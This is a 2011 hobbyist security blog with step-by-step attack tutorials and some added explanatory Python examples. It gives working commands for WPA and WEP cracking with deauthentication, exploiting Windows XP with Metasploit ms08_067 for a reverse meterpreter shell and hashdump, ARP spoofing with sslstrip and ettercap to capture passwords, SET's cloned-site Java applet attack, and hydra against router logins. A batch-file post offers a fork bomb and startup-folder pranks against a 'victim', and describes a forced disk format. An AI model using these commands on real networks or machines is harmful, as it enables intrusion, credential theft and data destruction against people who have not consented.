Saturday 2 July 2011

Cracking WPA using pyrit and aircrack

Hi all,

This is the follow on post to the pyrit set-up.
Once it's been set up you are able to test the strength of the passphrase on your own WPA-protected router.

There are a few important points to note when cracking WPA.
Firstly, it has to be your own router or you must have permission from the administrator.
Secondly, the key you're cracking has to be in the word list or dictionary file; if the passphrase isn't in the file, the key will not be cracked.
The passphrase is case sensitive, so 'insecurepass' is different to 'Insecurepass'.
Finally, the access point has to have a client connected. The four-way handshake is only exchanged when a client (re)connects, so the attack de-authenticates a connected client and captures the handshake as it reconnects.

The method behind WPA cracking is different to that of WEP. WEP is broken by collecting a large number of frames and exploiting its weak 24-bit IVs, so the key falls out statistically. WPA-PSK is attacked by first capturing the four-way handshake, where the client authenticates to the AP, and then running a dictionary attack offline: each candidate passphrase is turned into a key and checked against the handshake, so the strength of the network rests entirely on the passphrase.

The commands:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid <bssid> mon0
aireplay-ng --deauth 0 -a <bssid> -c <client> mon0

Ctrl + C to cancel the deauth and the capture, once airodump-ng shows "WPA handshake: <bssid>" in its top right corner

pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack-ng -r wpadb output-01.cap
Commands will differ for each WPA crack and access point. -c is the channel of the AP (mine is on 11), -w is the prefix of the capture file (airodump-ng writes output-01.cap, which is the file handed to aircrack-ng), and the BSSID and the client's MAC come from the airodump-ng listing. --deauth 0 keeps sending deauthentication frames until you stop it; a small count such as 5 is normally enough to make the client reconnect and hand you the handshake.
In the pyrit section pass.lst is a simple list that I created for the purpose of this vid and contains a few keys. This should be replaced with a decent word list or password list. pyrit eval shows what is in the database, batch does the expensive work of turning every word into a Pairwise Master Key for each stored ESSID, verify recomputes a sample of the results to check them, and export_hashdb writes them out in the airolib-ng format that aircrack-ng reads with -r.
j2neonAP is my ESSID and again this is different for each network. It is the salt in the PBKDF2 step that turns a passphrase into the PMK, which is why pyrit needs it before batch and why the exported table only works against that one network name.
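To make the salt point concrete, here is an added example (not code from the original post, and not pyrit's or aircrack-ng's own code) that does the whole pyrit batch / aircrack-ng -r job in a few functions: PBKDF2 from passphrase and ESSID to the PMK, PTK expansion with the handshake's nonces and MAC addresses, and the MIC check on EAPOL message 2. There is no capture file; make_handshake() constructs a stand-in handshake with made-up MACs and nonces, and the IEEE test vector is the only real-world value in it:

```python
"""Added example (not code from the original post or from pyrit/aircrack-ng):
what the pyrit batch / aircrack-ng -r pair does, reduced to a few functions.
The 'handshake' is CONSTRUCTED by make_handshake(); MAC addresses and nonces
are made up. Only hashlib/hmac from the standard library are used."""
import hashlib
import hmac

MIC_OFFSET = 81   # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).
    # This is the slow step, and the ESSID is the salt: a precomputed table
    # is only valid for the one network name it was built for.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame with
    # the MIC field zeroed, truncated to 16 bytes. KCK is the first 16 bytes of the PTK.
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase: str, essid: str) -> dict:
    # CONSTRUCTED stand-in for what airodump-ng writes to output-01.cap: the two MAC
    # addresses, both nonces, and EAPOL message 2 carrying a MIC computed under the
    # real passphrase. Field layout follows the EAPOL-Key frame; values are arbitrary.
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol = (bytes.fromhex("0103005f")        # EAPOL version 1, type 3 (Key), body length 95
             + b"\x02"                        # descriptor type: RSN
             + bytes.fromhex("010a")          # key info: version 2 (HMAC-SHA1), pairwise, MIC set
             + bytes.fromhex("0010")          # key length
             + b"\x00" * 7 + b"\x01"          # replay counter
             + snonce                         # key nonce (SNonce in message 2)
             + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, ID
             + b"\x00" * 16                   # key MIC (filled in below)
             + b"\x00\x00")                   # key data length
    kck = derive_ptk(pmk_from_passphrase(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce, "eapol": eapol}


def build_pmk_table(essid: str, words) -> dict:
    # 'pyrit batch' in miniature: do the expensive PBKDF2 once per (ESSID, word).
    return {w: pmk_from_passphrase(w, essid) for w in words}


def crack(handshake: dict, pmk_table: dict):
    # 'aircrack-ng -r': per table entry only the cheap PTK + MIC check remains.
    # Returns the passphrase, or None if it is not in the table (or the table
    # was built for a different ESSID).
    h = handshake
    captured_mic = h["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word, pmk in pmk_table.items():
        kck = derive_ptk(pmk, h["ap_mac"], h["sta_mac"], h["anonce"], h["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, h["eapol"]), captured_mic):
            return word
    return None


def known_vector_ok() -> bool:
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
    want = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return pmk_from_passphrase("password", "IEEE").hex() == want


if __name__ == "__main__":
    hs = make_handshake("insecurepass", "j2neonAP")
    table = build_pmk_table("j2neonAP", ["password", "Insecurepass", "insecurepass", "letmein"])
    print("PBKDF2 self-test:", known_vector_ok())
    print("recovered:", crack(hs, table))            # insecurepass
    print("same table, wrong ESSID:", crack(hs, build_pmk_table("otherAP", ["insecurepass"])))  # None
```

Two things fall out of running it: 'Insecurepass' produces a completely different PMK from 'insecurepass', which is the case-sensitivity point above, and a table built for otherAP never matches a j2neonAP handshake, which is why pyrit wants the ESSID before batch and why a table from one job is useless against the next network.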

Videos:

Blip.tv link:
Cracking WPA using pyrit and aircrack Blip.tv

YouTube link:
Cracking WPA using pyrit and aircrack YouTube

Sorry again for the square mouse; Camtasia, VB and BT5 don't play together nicely.

Thanks
2neon

Friday 1 July 2011

Installing pyrit into BT5

Hey all,

It's been a while again since the last video. I have spent some serious time doing boot to roots and the metasploit unleashed tut. Anyway this is a two part post; the first being the setup and the second being WPA cracking using pyrit.

That having been said, I'll get on with it!

Pyrit is used to create hash tables: it precomputes the Pairwise Master Keys for a word list against one ESSID, and those tables can then be used to crack a captured WPA handshake and test how secure the wireless key is. In this post the primary objective is to download and install all of the necessary components for pyrit.

Pyrit also supports GPU processing, so as I have an Nvidia card I will be setting up pyrit to run using CUDA. This step is optional and will be different if you are using AMD/ATi (pyrit's trunk has a separate OpenCL module for those cards).

Also it's a good idea to run pyrit list_cores to make sure it's all working correctly (the GPU should show up as a core alongside the CPUs), and if you want to see the speed of the cores, run the benchmark.

Commands

These commands are taken from another thread on the backtrack forum, as they are the best way to install it and have come up in posts multiple times.

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

apt-get install libssl-dev scapy python-dev
cd pyrit_svn/pyrit    (the checkout lands in the current directory, not in /)
python setup.py build
python setup.py install
CUDA/Nvidia only!

Then download the nvidia-toolkit from:

http://developer.nvidia.com/cuda-toolkit-32-downloads

Download the CUDA Toolkit for Ubuntu Linux 10.04. It doesn't matter if you already have the graphics drivers; you need the toolkit anyway because it contains the nvcc compiler that builds the CUDA module. If you accidentally download only the developer drivers you won't be able to install the module, as it needs this toolkit!
sh cudatoolkit_3.2.16_linux_64_ubuntu10.04.run
cd ../cpyrit_cuda    (i.e. pyrit_svn/cpyrit_cuda, next to the pyrit directory built above)
python setup.py build
python setup.py install

pyrit list_cores
pyrit benchmark
Videos

Youtube:
Installing pyrit into BT5 YouTube

Blip.tv:
Installing pyrit into BT5 Blip.tv

Cheers
2neon

Wednesday 8 June 2011

ssh with x11 and ftp in bt5

Hey all,

Well it's been a while, and now university is done with and I've had time to play with BT5 (which is the all new and shiny BackTrack), it's time for a blog post 8-).

Right, so the concept is similar to remote desktop, except that what you get is a shell (and, with X11 forwarding, individual graphical programs) rather than a whole desktop. The traffic is encrypted by SSH, so it is as secure as the way you set it up.

This allows you to connect to one PC and run scripts, tool kits and programs from a second.
The programs are still running on the first BackTrack machine; they are just accessible from the second.
This is useful if you are out and about doing work/pentesting and need the power of the second machine.

Other than this, it's useful in an internet cafe: a browser forwarded over SSH runs on your own machine at home, so the cafe network only ever sees the SSH connection.

The steps;

sshd-generate
/etc/init.d/ssh start
update-rc.d ssh defaults
ifconfig

This is all the configuration 'needed'. sshd-generate creates the host keys (BackTrack ships without them), /etc/init.d/ssh start launches the daemon, update-rc.d ssh defaults adds it to start-up (not needed, but it saves typing /etc/init.d/ssh start every boot), and ifconfig just shows the internal IP you will connect to. On top of that it's worth looking at fail2ban, forwarding a non-standard port on the router, or simply changing the port sshd listens on in /etc/ssh/sshd_config.

Windows steps;

Download and install PuTTY, or just grab the Xming server, as I believe PuTTY is bundled with it.
If you want secure FTP, grab FileZilla.

Run all the installers and then open up PuTTY.

Insert the IP, either internal or external.
Under Connection -> SSH -> X11 tick 'Enable X11 forwarding' and set the X display location to localhost:0 (Xming must be running first).
Click Open to connect.
Type in the user name and password. *This may take some time.*
That should be it; if X11 is working you can launch graphical programs like firefox from the shell and they appear on the Windows desktop.

For FTP, use SFTP in FileZilla on port 22, which is the SSH port; it goes over the same encrypted connection, so no separate FTP server is needed.
Biggest point here: *If you are doing this across the internet make sure you have a long password, and think about changing the port or implementing fail2ban.* BackTrack's default root password is toor and everyone knows it, so change it with passwd before sshd is reachable from outside.
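As an added example that is not part of the original post, here is what 'changing the port' and 'implementing fail2ban' look like on disk. The port number, retry counts and ban time are my own choices; the file paths are the Ubuntu/BackTrack defaults:

```conf
# /etc/ssh/sshd_config (the lines worth changing; restart with /etc/init.d/ssh restart)
# A non-default port keeps the automated scanners quiet; it is not a security control on its own.
Port 2222
Protocol 2
# BT5 only has the root account, so root login has to stay on. That makes a long
# root password (and changing it from the default 'toor') the control that matters.
PermitRootLogin yes
PasswordAuthentication yes
# Drop the connection after three wrong passwords and don't let idle logins hang around.
MaxAuthTries 3
LoginGraceTime 30

# /etc/fail2ban/jail.local (read on top of jail.conf; only the overrides go here)
[ssh]
enabled  = true
# must match the Port line above, or the bans land on the wrong port
port     = 2222
filter   = sshd
logpath  = /var/log/auth.log
maxretry = 5
bantime  = 3600
```

With the port moved, PuTTY and FileZilla need 2222 instead of 22, and the router's port forward points at 2222 on the BackTrack box. Check with cat /var/log/auth.log that failed attempts are actually being logged, because fail2ban can only ban what it can see.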

Video here:
ssh in bt5

Also on YouTube, watch it in 720p for clarity

Cheers
2neon

Sunday 15 May 2011

Metasploit xp sp2 exploit

Hi all,

This time I have been playing with metasploit and wow, it's pretty cool. Obviously this is quite well used, known and regularly updated. As it is the first time that I have used it I decided to make a vid and quick tutorial on how to do it.

So, first off, I set up a vulnerable xp sp2 box, the vulnerability being that Microsoft made it, teehee!
Then I used backtrack 4 with metasploit installed to use the ms08_067_netapi exploit.

Firstly update the framework:
cd /pentest/exploits/framework3
svn up

Once this has finished, type cd on its own to get back to /root, then:
nmap -O 192.168.0.127  (OS detection against the victim, to confirm it really is an XP box)
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.0.127  (This is the victim's IP)
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST   (IP of your PC, where the reverse shell connects back to)
exploit    (this runs the exploit)
If all went well you should have a meterpreter shell open.

I then used some of the commands within the meterpreter to see how good it was!
sysinfo
ipconfig
help
hashdump
screenshot
shell

Video here;
metasploit xpsp2

Cheers.
2neon

Monday 9 May 2011

Cuda-multiforcer

Righty then, 

This looks at how to crack hashes on the computer's GPU. The reason for this is that the massively parallel architecture of graphics cards makes certain programs so much faster to run, and hash cracking, where millions of independent guesses are hashed and compared, is a perfect fit.
CUDA programs have to be specifically written to run on the GPU; you cannot run ordinary programs on there. Also CUDA is Nvidia only; ATi has its own equivalent.

Right onwards...

Cuda-multiforcer isn't on the backtrack 4 iso. It is in the repositories, therefore;

apt-get install cuda-multiforcer
is all that is needed.

When cuda-multiforcer was first run I received an error; 
./CUDA-Multiforcer: error while loading shared libraries: libargtable2.so.0: cannot open shared object file: No such file or directory.

After some googling, the fix was simple, copy the contents of
/pentest/passwords/cuda-multiforcer/lib32
to
/lib

Ok, running the cuda-multiforcer;

cd /pentest/passwords/cuda-multiforcer
./CUDA-Multiforcer -c charsets/charsetlowercasenumeric -f /root/j2neon/hash.txt --min 3 --max 6 -h MD5

Ok, the options;
-c is the character set, picked from the charsets folder depending on what you need (lowercase plus digits here)
-f is the location of the file containing the hashes, one per line
--min minimum candidate length
--max maximum candidate length
-h hash type (MD5 here; the tool also handles other unsalted types such as NTLM)
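The same search done on the CPU makes the options, and the reason for the GPU, easy to see. This is an added example, not cuda-multiforcer's code: it walks the charset between --min and --max exactly as the option names describe, and keyspace() gives the number of candidates that walk produces. The target hashes are constructed from known words, so it runs offline:

```python
"""Added example (not cuda-multiforcer's code): the same search it runs on the
GPU, done on the CPU with itertools, plus the keyspace arithmetic that shows why
the GPU matters. Target hashes are CONSTRUCTED from known words."""
import hashlib
import itertools

CHARSETS = {
    "charsetlowercasenumeric": "abcdefghijklmnopqrstuvwxyz0123456789",
    "charsetlowercase": "abcdefghijklmnopqrstuvwxyz",
}


def keyspace(charset: str, min_len: int, max_len: int) -> int:
    # Number of candidates --min..--max generates: sum of |charset|^n.
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def digest(word: str, algo: str = "md5") -> str:
    return hashlib.new(algo, word.encode()).hexdigest()


def brute_force(target_hashes, charset: str, min_len: int, max_len: int, algo: str = "md5") -> dict:
    # Equivalent of: CUDA-Multiforcer -c <charset> -f hashes.txt --min --max -h <algo>
    # Walks every string of length min_len..max_len over the charset, hashes it once,
    # and looks the digest up in the target set; stops early when all are found.
    # Returns {hex digest: plaintext} for everything recovered.
    wanted = {h.lower() for h in target_hashes}
    found = {}
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            candidate = "".join(combo)
            h = hashlib.new(algo, candidate.encode()).hexdigest()
            if h in wanted:
                found[h] = candidate
                if len(found) == len(wanted):
                    return found
    return found


if __name__ == "__main__":
    cs = CHARSETS["charsetlowercasenumeric"]
    # --min 3 --max 6 over lowercase+digits: 2,238,974,784 candidates. At a CPU rate of
    # a few million MD5/s that is minutes of waiting; a GPU doing a billion or more
    # hashes per second gets through it in seconds.
    print(keyspace(cs, 3, 6))
    targets = [digest("ab1"), digest("zz9")]    # constructed hash.txt contents
    print(brute_force(targets, cs, 3, 3))
```

Note that the set lookup is what lets one pass crack a whole file of hashes at once, which is also why unsalted MD5 and NTLM are the easy cases: with a per-user salt every candidate would have to be hashed once per target instead of once in total.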

Video:

The passwords were short but it's still seriously fast!

Until next time.
Cheers 
2neon

Thursday 28 April 2011

What's to come?

Hey all,

As it has again been ages since any real updates I thought I would explain what's going on!
I finished my paper for university, which was on password cracking using parallel processors, my results will be on here but not just yet.

Now I've been playing with GPU related stuff there is going to be a fair amount of CUDA related security tools such as pyrit and crark.

Stay tuned, 
2neon


ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, a new blog post and vid are here; this is what I did:

Firstly I edited etter.conf to allow the usage of iptables,
then enabled IP forwarding,
next ARP spoofed the victim.

This step tells the victim that my machine is the router (a second arpspoof with the addresses swapped tells the router that I am the victim, so both directions pass through me). You can set the target to the IP of one machine, or leave -t off to poison every host on the LAN; I used the broadcast address, .255, in the video. IP forwarding has to be on, otherwise the victim's traffic dies at my machine and they lose their connection, which gives the game away.

The next step is to set up iptables. This takes anything coming in on port 80, i.e. plain web traffic, and redirects it to port 1000, where sslstrip is listening.

sslstrip doesn't break SSL itself. It works on the plain HTTP side: it talks HTTPS to the real server, then rewrites the https:// links and redirects in the pages it passes back so that the victim's browser keeps talking plain HTTP to me. The client never starts an SSL connection in the first place, so there is no certificate warning to click through.

Once you have done this you can do whatever you wish to the victim's traffic.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in real time. You can also use driftnet, which shows the images from the websites your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # from the two redir_command lines in the "if you use iptables" section
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables IP forwarding)
you can use cat /proc/sys/net/ipv4/ip_forward to see the contents (1 means on)
arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip listens on 10000 by default, so tell it to use the port iptables redirects to:
sslstrip -a -k -f -l 1000  (-a logs all traffic, -k kills sessions that are already open so the victim has to log in again, -f swaps in a padlock favicon)
ettercap -T -q -i eth0
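To see what arpspoof is actually putting on the wire, here is an added example (not code from the original post or from dsniff) that builds the forged ARP replies for both directions and decodes them back, so you can read off what each side's ARP cache is being told. The frames are constructed and never sent; every MAC address is made up and the IPs are the ones from the commands above:

```python
"""Added example (not code from the original post or from dsniff): the forged
ARP replies that arpspoof sends, built and parsed by hand so you can see what
ends up in each ARP cache. Frames are CONSTRUCTED and never sent; every MAC
address below is made up, the IPs are the ones used in the post."""
import struct

ARP_ETHERTYPE = b"\x08\x06"
ARP_REPLY = 2


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def ip(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def build_arp_reply(sender_mac: bytes, sender_ip: bytes, target_mac: bytes, target_ip: bytes) -> bytes:
    # Ethernet: dst, src, type. ARP: htype=1 (Ethernet), ptype=0x0800 (IPv4),
    # hlen=6, plen=4, opcode=2 (reply), then the sender/target hardware+protocol pairs.
    # The "sender" pair is the lie: whoever receives this caches sender_ip -> sender_mac.
    eth = target_mac + sender_mac + ARP_ETHERTYPE
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY) + sender_mac + sender_ip + target_mac + target_ip
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    # Minimal decoder for the frames above (and for real Ethernet/IPv4 ARP frames).
    if len(frame) < 42 or frame[12:14] != ARP_ETHERTYPE:
        raise ValueError("not an Ethernet/ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    body = frame[22:42]
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return {
        "op": "reply" if op == ARP_REPLY else "request",
        "sender_mac": fmt_mac(body[0:6]), "sender_ip": fmt_ip(body[6:10]),
        "target_mac": fmt_mac(body[10:16]), "target_ip": fmt_ip(body[16:20]),
    }


def poison_pair(attacker_mac, gateway_mac, gateway_ip, victim_mac, victim_ip):
    # Direction 1 (what 'arpspoof -t victim gateway' does): tell the victim
    # "gateway_ip is-at attacker_mac". Direction 2 is the second arpspoof with the
    # arguments swapped: tell the gateway "victim_ip is-at attacker_mac".
    to_victim = build_arp_reply(mac(attacker_mac), ip(gateway_ip), mac(victim_mac), ip(victim_ip))
    to_gateway = build_arp_reply(mac(attacker_mac), ip(victim_ip), mac(gateway_mac), ip(gateway_ip))
    return to_victim, to_gateway


if __name__ == "__main__":
    to_victim, to_gateway = poison_pair("00:aa:bb:cc:dd:01", "00:aa:bb:cc:dd:02", "192.168.0.1",
                                        "00:aa:bb:cc:dd:03", "192.168.0.50")
    # arpspoof repeats these every couple of seconds, because the real gateway and
    # victim keep answering genuine ARP requests and would otherwise win the cache back.
    print("victim caches :", parse_arp(to_victim))
    print("gateway caches:", parse_arp(to_gateway))
```

The decoded output is also what you would look for on the defensive side: a reply whose sender IP is the gateway's but whose sender MAC is not the gateway's, repeated every few seconds, is the signature of this attack in a packet capture.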

The video:
Arp spoof vid

Cheers
2neon

Tuesday 5 April 2011

SET Java Applet Attack

I am going to be looking at the Java applet attack in SET, the Social-Engineer Toolkit.
SET uses smart ways of exploiting the user rather than the system, since it's often easier to get the victim to give you access than to break into the system itself.

This attack first clones a web site and adds a fake Java applet carrying a payload, then ettercap uses DNS spoofing to send the victim to that site instead of the real one.
Finally, the payload is a Metasploit reverse connection shell, allowing the attacker to use Metasploit commands to do whatever he wants. There will be a Metasploit video coming soon!

In a shell, change to the SET directory with cd /pentest/exploits/SET
execute SET using ./set
update SET, then exit and reload it using ./set
and update the Metasploit modules.

The next step is to change the settings using nano config/set_config
apt-get the 2 Java packages (you don't need both, but I would always rather overdo it!)
edit the config and save with ctrl + x

Reload SET and then you're ready to set up a cloned website.

Once the victim has accepted the fake Java applet, you own him :D
SET is a fantastic tool, have a look round and play with it.



Cheers
2neon

Geoffrey everything about you is sooooo Geoffrey!

Tuesday 29 March 2011

*random post* .bat

This is a pointless post really, lol.
Most people know about it already.
I thought it would be a good idea just to add a few bits.
Open Notepad, paste the text in, Save As, change 'Save as type' to All Files, then name it something.bat.
In BackTrack use kate and save it as something.bat.

3 of the funniest batch files.
shutdown -l
Simple log off batch file; chuck it into the startup folder and every time the victim logs in they will be logged straight back out.
:a
start
goto :a
This is a fork bomb.
It opens a cmd shell inside another, and more and more, until the PC can't handle it,
which is usually a matter of seconds. Picture here

Last one which is harsh but funny, don't run it yourself!

Formatting

*Anti-virus' read this as a trojan so I linked it in a pastebin here*

The speed this formats, is rapid. By the time the victim realises what is going on, its reinstall time.
It formats the system drive in forced mode then shuts the pc down.

The locations of startup do vary between xp and w7.
Here are the default startup locations:
w7: C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup
xp: C:\Documents and Settings\Victim\Start Menu\Programs\Startup

Next time something more hackerererish.

Cheers
2neon

Meller "What Would Meller Do?" '10

Wireless Router Passwords Hydra

I know, it's been a while, but after a fair few pints of Guinness on St. Patrick's day I decided to do this video.
Strangely enough the vid didn't need much editing, I'm just very lazy!

Right, the router is a standard Virgin Media device. The attack is a brute force in the sense that hydra just tries every password on the list in turn; if the password isn't on the list, you're not going to crack it. Note as well that some routers will not let you do this (lockouts or delays after a few failed logins).

The only values that you will really have to change are the word list (-P followed by its path; my 2neon list was full of random words for this video. Lowercase -p is a single password, not a file)
and the IP address of the router, as yours might not be on 192.168.0.1.


Video:
Hydra cracking 


Cheers
2neon

Under Pricey's regime "You can keep messing about, but you will be kicked out"

Thursday 24 February 2011

WEP Cracking

So next vid then, I decided to show how to crack a WEP key. WEP is very insecure and not too difficult to break.

So before everyone thinks "yay free wifi", don't start breaking in to your next door's wifi. Instead, try advising them that maybe they should think about changing their security.

A few prerequisites;
You will struggle to do this in a virtual box, as the guest only sees a virtual NIC; a USB wireless adapter passed through to the VM is the usual way round it.
A lot of laptop network cards will not work as there are driver issues.
The network card must be able to switch to monitor mode and, if it can also packet inject, it makes life easier.

Theory:
So why is WEP so insecure? WEP uses the RC4 stream cipher with a per-packet key made of a 24-bit initialisation vector (IV) followed by the WEP key.
The IV is sent in the clear at the start of every frame (the key itself is never transmitted) and at only 24 bits it is far too short: a busy AP runs through all 16 million values in hours, after which keystreams repeat, and because of how RC4 schedules its key the first keystream bytes leak information about the key bytes for certain IVs. Once an attacker has collected enough frames with distinct IVs (a few tens of thousands for aircrack-ng's PTW attack) it's possible to work out the WEP key statistically. By re-injecting captured ARP packets we make the AP generate new IVs far faster than normal traffic would, which speeds the process up.


The steps:

airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c (channel) -w 2neon --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -3 -b (bssid) mon0
aircrack-ng -b (bssid) 2neon-01.cap

-c is the channel of the access point
-w is the capture file prefix; name it anything, airodump-ng appends -01, so the file you give aircrack-ng is 2neon-01.cap
-1 0 is a fake authentication with the AP, needed so it accepts our injected frames; -3 is the ARP request replay that generates the IVs
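The theory section above comes down to one property of RC4, and it is small enough to show in full. This is an added example (not code from the original post or from aircrack-ng): a toy WEP with its own RC4, used to demonstrate that a repeated IV means a repeated keystream, that one frame with predictable plaintext (an ARP request, say) hands the attacker that keystream without the key, and how few frames the birthday bound says it takes before an IV repeats. All frames and the 40-bit key are constructed, and the CRC-32 ICV real WEP appends is left out:

```python
"""Added example (not code from the original post or from aircrack-ng): a toy
WEP to show the flaw the text describes. RC4 is implemented here; frames are
CONSTRUCTED; the ICV (CRC-32) that real WEP appends is left out for brevity."""
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS            # 16,777,216 possible IVs


def rc4_keystream(key: bytes, length: int) -> bytes:
    # Plain RC4 (KSA then PRGA). WEP uses it with the per-packet key IV || WEP key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    # The 3-byte IV goes on the wire in the clear; the 40- or 104-bit key never does.
    assert len(iv) == 3 and len(key) in (5, 13)
    return iv + xor(plaintext, rc4_keystream(iv + key, len(plaintext)))


def wep_decrypt(frame: bytes, key: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return xor(body, rc4_keystream(iv + key, len(body)))


def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes):
    # Attacker side, no key needed: the IV is readable, and for a frame whose
    # plaintext is predictable (an ARP request, say) ciphertext XOR plaintext
    # is the keystream RC4 produced for that IV.
    return frame[:3], xor(frame[3:], known_plaintext)


def decrypt_with_reused_iv(frame: bytes, iv: bytes, keystream: bytes):
    # Any later frame under the same IV reuses the same keystream, so the
    # recovered keystream decrypts it directly. Returns None for other IVs.
    if frame[:3] != iv:
        return None
    body = frame[3:]
    if len(body) > len(keystream):
        raise ValueError("recovered keystream shorter than frame")
    return xor(body, keystream[:len(body)])


def frames_until_iv_repeat(probability: float) -> int:
    # Birthday bound: about sqrt(2 N ln(1/(1-p))) frames before some IV repeats.
    return int(math.sqrt(2 * IV_SPACE * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    key = bytes.fromhex("0123456789")          # made-up 40-bit WEP key
    iv = b"\x00\x00\x01"
    arp_plain = b"ARP who-has 192.168.0.1 ?"   # constructed 'known' plaintext
    f1 = wep_encrypt(iv, key, arp_plain)
    f2 = wep_encrypt(iv, key, b"POST pass=hunter2")   # second frame, same IV
    iv_seen, ks = keystream_from_known_plaintext(f1, arp_plain)
    print(decrypt_with_reused_iv(f2, iv_seen, ks))    # b'POST pass=hunter2'
    print(frames_until_iv_repeat(0.5))                # about 4800 frames
```

This only shows the keystream-reuse half of the story; aircrack-ng goes further and recovers the key itself from the statistical bias in the first keystream bytes, which is why it wants many distinct IVs rather than a repeated one. The ARP replay (-3) exists to manufacture those IVs quickly.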

The video:
WEP cracking in BT

Again the mouse got mangled when recording this; I will make sure that's sorted for the next vids.

In the words of swaZ "we're cooking now".

Cheers
2neon

Etterfilters

Hi all.

So this is the first actual attack that we are going to do. It is a man-in-the-middle type attack, which means we sit in between the router and the victim: any traffic that goes between the two points first has to pass through my PC.

<Router>------<my pc>------<Victim>

This is done using ARP poisoning.

The ettercap filter is harmless and is essentially an IF statement.
The IF statement checks whether there are pictures in the victim's web traffic and replaces them with the one that you specify.

The filter can be found here:
Irongeeks Ettercap Filter

The video can be found here:
Ettercap Filter Video

In the video, on the victim machine, I had to refresh, as the first time Firefox loads the page it is pulled from the cache.


2neon

VBox Install BT4

OK, first off the video on this isn't fantastic.
For some reason when recording the mouse came out as a square :/

In this video I install backtrack 4 R2 in a virtualbox.

This is just a very simple install to the virtual box hard drive.
The install and tweaks are just how I like to set it up.

The steps:
Firstly creating a new machine in a virtual box, with hard drive and customised settings.
Next boot from the bt4 iso.
startx
Install
Select location and keyboard settings.
Select amount of disk space to use.
Once the install has finished reboot.

login: root
pass: toor
fix-splash800
nano /root/.bash_profile and add the two lines:
start-network
startx
hit ctrl + x
and save it
reboot again
system menu -> storage media-> open additions-> open terminal
ls
bash VBoxLinuxAdditions.run
apt-get -y update
apt-get -y upgrade



The video:
VB install of BT4

Not sure why it decided to play up on me :(

Cheers
2neon

Friday 18 February 2011

Live USB install

Right guys,

I decided to take it right from the basics so in this post and video I have downloaded and installed backtrack 4 R2.

